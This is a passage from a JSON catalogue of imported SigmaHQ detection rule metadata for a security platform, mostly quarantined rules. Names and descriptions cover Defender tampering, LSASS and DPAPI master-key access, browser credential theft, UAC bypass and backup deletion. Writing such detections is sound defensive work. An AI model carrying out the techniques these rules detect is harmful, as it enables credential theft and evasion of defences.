"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-proxy-execution-via-squirrel-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_squirrel_proxy_execution.yml" } }, { "id": "sigmahq-sigma-452bce90-6fb0-43cc-97a5-affc283139b3", "type": "detection", "name": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", "description": "Detects the usage of \"reg.exe\" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-defender-registry-key-tampering-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "452bce90-6fb0-43cc-97a5-affc283139b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml" } }, { "id": "sigmahq-sigma-452df256-da78-427a-866f-49fa04417d74", "type": "detection", "name": "Time Machine Backup Deletion Attempt Via Tmutil - MacOS", "description": "Detects deletion attempts of MacOS Time Machine backups via the native backup utility \"tmutil\".\nAn adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/time-machine-backup-deletion-attempt-via-tmutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "452df256-da78-427a-866f-49fa04417d74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" } }, { "id": "sigmahq-sigma-45545954-4016-43c6-855e-eae8f1c369dc", "type": "detection", "name": "Protected Storage Service Access", "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/protected-storage-service-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45545954-4016-43c6-855e-eae8f1c369dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_protected_storage_service_access.yml" } }, { "id": "sigmahq-sigma-455b9d50-15a1-4b99-853f-8d37655a4c1b", "type": "detection", "name": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", "description": "Detects active directory enumeration activity using known AdFind CLI flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-suspicious-activedirectory-enumeration-via-adfind-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml" } }, { "id": "sigmahq-sigma-457cc9ac-d8e6-4d1d-8c0e-251d0f11a74c", "type": "detection", "name": "Modification or Deletion of an AWS RDS Cluster", "description": "Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modification-or-deletion-of-an-aws-rds-cluster.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "457cc9ac-d8e6-4d1d-8c0e-251d0f11a74c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_rds_dbcluster_actions.yml" } }, { "id": "sigmahq-sigma-457df417-8b9d-4912-85f3-9dbda39c3645", "type": "detection", "name": "Suspicious Nohup Execution", "description": "Detects execution of binaries located in potentially suspicious locations via \"nohup\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-nohup-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "457df417-8b9d-4912-85f3-9dbda39c3645", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml" } }, { "id": "sigmahq-sigma-45810b50-7edc-42ca-813b-bdac02fb946b", "type": "detection", "name": "Steganography Hide Zip Information in Picture File", "description": "Detects appending of zip file to image", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/steganography-hide-zip-information-in-picture-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45810b50-7edc-42ca-813b-bdac02fb946b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_hidden_zip_files_steganography.yml" } }, { "id": "sigmahq-sigma-459a2970-bb84-4e6a-a32e-ff0fbd99448d", "type": "detection", "name": "Azure Key Vault Modified or Deleted", "description": "Identifies when a key vault is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-key-vault-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", "type": "detection", "name": "Arbitrary File Download Via MSOHTMED.EXE", "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-msohtmed-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msohtmed_download.yml" } }, { "id": "sigmahq-sigma-45a594aa-1fbd-4972-a809-ff5a99dd81b8", "type": "detection", "name": "Run PowerShell Script from ADS", "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/run-powershell-script-from-ads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_run_script_from_ads.yml" } }, { "id": "sigmahq-sigma-45d3a03d-f441-458c-8883-df101a3bb146", "type": "detection", "name": "Launch-VsDevShell.PS1 Proxy Execution", "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/launch-vsdevshell-ps1-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45d3a03d-f441-458c-8883-df101a3bb146", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" } }, { "id": "sigmahq-sigma-45e112d0-7759-4c2a-aa36-9f8fb79d3393", "type": "detection", "name": "IE Change Domain Zone", "description": "Hides the file extension through modification of the registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ie-change-domain-zone.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_change_security_zones.yml" } }, { "id": "sigmahq-sigma-460479f3-80b7-42da-9c43-2cc1d54dbccd", "type": "detection", "name": "Creation of a Local Hidden User Account by Registry", "description": "Sysmon registry detection of a local hidden user account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-a-local-hidden-user-account-by-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" } }, { "id": "sigmahq-sigma-46123129-1024-423e-9fae-43af4a0fa9a5", "type": "detection", "name": "File Download Via Windows Defender MpCmpRun.EXE", "description": "Detects the use of Windows Defender MpCmdRun.EXE to download files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-windows-defender-mpcmprun-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46123129-1024-423e-9fae-43af4a0fa9a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml" } }, { "id": "sigmahq-sigma-4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "type": "detection", "name": "HackTool - Impacket Tools Execution", "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-impacket-tools-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_impacket_tools.yml" } }, { "id": "sigmahq-sigma-46490193-1b22-4c29-bdd6-5bf63907216f", "type": "detection", "name": "VBScript Payload Stored in Registry", "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vbscript-payload-stored-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46490193-1b22-4c29-bdd6-5bf63907216f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" } }, { "id": "sigmahq-sigma-46530378-f9db-4af9-a9e5-889c177d3881", "type": "detection", "name": "Azure Device or Configuration Modified or Deleted", "description": "Identifies when a device or device configuration in azure is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-device-or-configuration-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46530378-f9db-4af9-a9e5-889c177d3881", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-46612ae6-86be-4802-bc07-39b59feb1309", "type": "detection", "name": "Access To Windows DPAPI Master Keys By Uncommon Applications", "description": "Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.\nThis can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-to-windows-dpapi-master-keys-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46612ae6-86be-4802-bc07-39b59feb1309", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_dpapi_master_key_access.yml" } }, { "id": "sigmahq-sigma-46a68649-f218-4f86-aea1-16a759d81820", "type": "detection", "name": "Windows Defender Exclusion List Modified", "description": "Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exclusion-list-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46a68649-f218-4f86-aea1-16a759d81820", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml" } }, { "id": "sigmahq-sigma-46dd5308-4572-4d12-aa43-8938f0184d4f", "type": "detection", "name": "Bypass UAC Using DelegateExecute", "description": "Bypasses User Account Control using a fileless method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-using-delegateexecute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46dd5308-4572-4d12-aa43-8938f0184d4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" } }, { "id": "sigmahq-sigma-470ec5fa-7b4e-4071-b200-4c753100f49b", "type": "detection", "name": "Failed Code Integrity Checks", "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1027.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/failed-code-integrity-checks.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "470ec5fa-7b4e-4071-b200-4c753100f49b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_codeintegrity_check_failure.yml" } }, { "id": "sigmahq-sigma-47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "type": "detection", "name": "Potential Browser Data Stealing", "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-browser-data-stealing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml" } }, { "id": "sigmahq-sigma-4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "type": "detection", "name": "Scheduled TaskCache Change by Uncommon Program", "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-taskcache-change-by-uncommon-program.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" } }, { "id": "sigmahq-sigma-472159c5-31b9-4f56-b794-b766faa8b0a7", "type": "detection", "name": "Suspicious LSASS Access Via MalSecLogon", "description": "Detects suspicious access to LSASS handle via a call trace to \"seclogon.dll\" with a suspicious access right.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-lsass-access-via-malseclogon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "472159c5-31b9-4f56-b794-b766faa8b0a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_seclogon_access.yml" } }, { "id": "sigmahq-sigma-4782eb5a-a513-4523-a0ac-f3082b26ac5c", "type": "detection", "name": "Mshtml.DLL RunHTMLApplication Suspicious Usage", "description": "Detects execution of commands that leverage the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mshtml-dll-runhtmlapplication-suspicious-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" } }, { "id": "sigmahq-sigma-47b3bbd4-1bf7-48cc-84ab-995362aaa75a", "type": "detection", "name": "Shell Execution via Git - Linux", "description": "Detects the use of the \"git\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-git-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "47b3bbd4-1bf7-48cc-84ab-995362aaa75a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_git_shell_execution.yml" } }, { "id": "sigmahq-sigma-47d65ac0-c06f-4ba2-a2e3-d263139d0f51", "type": "detection", "name": "Potential XCSSET Malware Infection", "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-xcsset-malware-infection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" } }, { "id": "sigmahq-sigma-47e4bab7-c626-47dc-967b-255608c9a920", "type": "detection", "name": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords.\nThis was seen being used in combination with \"icacls\" and other utilities to spot misconfigured files or folders permissions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/permission-misconfiguration-reconnaissance-via-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "47e4bab7-c626-47dc-967b-255608c9a920", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" } }, { "id": "sigmahq-sigma-480421f9-417f-4d3b-9552-fd2728443ec8", "type": "detection", "name": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wow6432node-windows-nt-currentversion-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "480421f9-417f-4d3b-9552-fd2728443ec8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" } }, { "id": "sigmahq-sigma-4809c683-059b-4935-879d-36835986f8cf", "type": "detection", "name": "System Information Discovery Using System_Profiler", "description": "Detects the execution of \"system_profiler\" with specific \"Data Types\" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.\nThis process is primarily used for system information discovery. However, \"system_profiler\" can also be used to determine if virtualization software is being run for defense evasion purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1497.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-using-system-profiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4809c683-059b-4935-879d-36835986f8cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" } }, { "id": 